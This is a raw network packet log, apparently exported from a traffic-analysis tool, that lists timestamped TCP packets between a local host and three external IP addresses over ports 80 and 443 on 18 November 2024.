                                                                                                                                                  Nov 18, 2024 18:21:44.657846928 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657856941 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.657859087 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657870054 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657870054 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.657881975 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.658616066 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.658632040 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.658657074 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.658668041 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.658668041 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.658668041 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.658680916 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.658698082 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.658705950 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.658720016 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.659468889 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.659492970 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.659504890 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.659516096 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.659518957 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.659533978 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.659535885 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.659535885 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.659547091 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.659565926 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.660223007 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660238028 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660248995 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660267115 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660268068 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.660275936 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.660279989 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660291910 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.660293102 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.660315037 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.660321951 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.661279917 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.661310911 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.661324024 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.661334991 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.661336899 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.661343098 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.661349058 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.661362886 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.661372900 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.662172079 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.662204981 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.662226915 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.662230968 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.662250042 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.662275076 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.692759991 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.692828894 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.692863941 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.692881107 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.692893982 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.692924976 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.693233967 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.693270922 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.693286896 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.693314075 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.771364927 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771425962 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771439075 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771523952 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.771796942 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771807909 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771821976 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771836996 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.771845102 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.771853924 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.771867037 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:44.772453070 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:44.772491932 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:48.881536007 CET8049165107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:48.881598949 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:52.617294073 CET4916580192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:21:53.262871027 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:53.262926102 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:53.262981892 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:53.267330885 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:53.267363071 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.478487015 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.478565931 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.485801935 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.485820055 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.486296892 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.574336052 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.619335890 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.848352909 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.848378897 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.848582029 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.848598003 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.965399027 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.965408087 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.965461969 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.965482950 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.965492010 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.965532064 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.966618061 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.966625929 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.966660023 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:54.966676950 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.966711044 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:54.974693060 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.082750082 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.082760096 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.082789898 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.082829952 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.082849979 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.097153902 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.097162962 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.097201109 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.097240925 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.097412109 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.200095892 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.200107098 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.200131893 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.200160980 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.200207949 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.214178085 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.214194059 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.214241028 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.214255095 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.317866087 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.317910910 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.317924023 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.317945957 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.318032980 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.331680059 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.331687927 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.331713915 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.331728935 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.331746101 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.434355021 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.434365034 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.434393883 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.434461117 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.449013948 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.449023962 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.449045897 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.449069977 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.449085951 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.535907030 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:55.535959959 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.536051035 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:55.536381960 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:55.536398888 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.553756952 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.553766966 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.553822041 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.553838968 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.565861940 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.565872908 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.565915108 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.565934896 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.670619011 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.670629978 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.670684099 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.670703888 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.683898926 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.683907986 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.683938980 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.683955908 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.683970928 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.684020996 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.788418055 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.788427114 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.788459063 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.788477898 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.788506031 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.789060116 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.789067984 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.789088964 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.789108038 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.789125919 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.804501057 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.804510117 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.804538965 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.804564953 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.804590940 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.905847073 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.905857086 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.905914068 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.905930996 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.919826031 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.919858932 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.919883966 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:55.919893980 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:55.919954062 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.256591082 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.256620884 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.256675005 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.256695032 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.257565022 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.257632017 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.257639885 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.258408070 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.258457899 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.258466005 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.260817051 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.260863066 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.260870934 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.262355089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.262408972 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.262417078 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.263174057 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.263222933 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.263231993 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.296417952 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.296487093 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.296504974 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.297740936 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.297791004 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.297811985 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.297820091 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.299134016 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.299166918 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.299187899 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.299196959 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.301508904 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.413826942 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.413842916 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.413904905 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.413928032 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.414855003 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.414912939 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.414921999 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.416125059 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.416182041 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.416191101 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.440403938 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.442611933 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:56.463084936 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:56.463100910 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.531063080 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.531234026 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.531290054 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532018900 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532028913 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532058001 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532078028 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.532089949 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532690048 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532701015 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532720089 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.532731056 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.532737970 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.533878088 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.533895016 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.533916950 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.533931017 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.533937931 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.535356998 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.584475994 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.588241100 CET49167443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:21:56.588258982 CET443491675.45.108.48192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.649068117 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.649084091 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.649132967 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.649137974 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.649173021 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.650279999 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.650289059 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.650331020 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.650343895 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.651115894 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.651150942 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.651165009 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.651171923 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.651247025 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.766032934 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.766046047 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.766105890 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.766138077 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.766839027 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.766891003 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.766899109 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.767827988 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.767879009 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.767888069 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.769464016 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.769520998 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.769531965 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.883944035 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.884011984 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.884035110 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.886327982 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.886337042 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.886385918 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.886385918 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.886404991 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.886446953 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.888083935 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.888091087 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.888117075 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:21:56.888129950 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.888159037 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:21:56.888716936 CET44349166142.215.209.78192.168.2.22
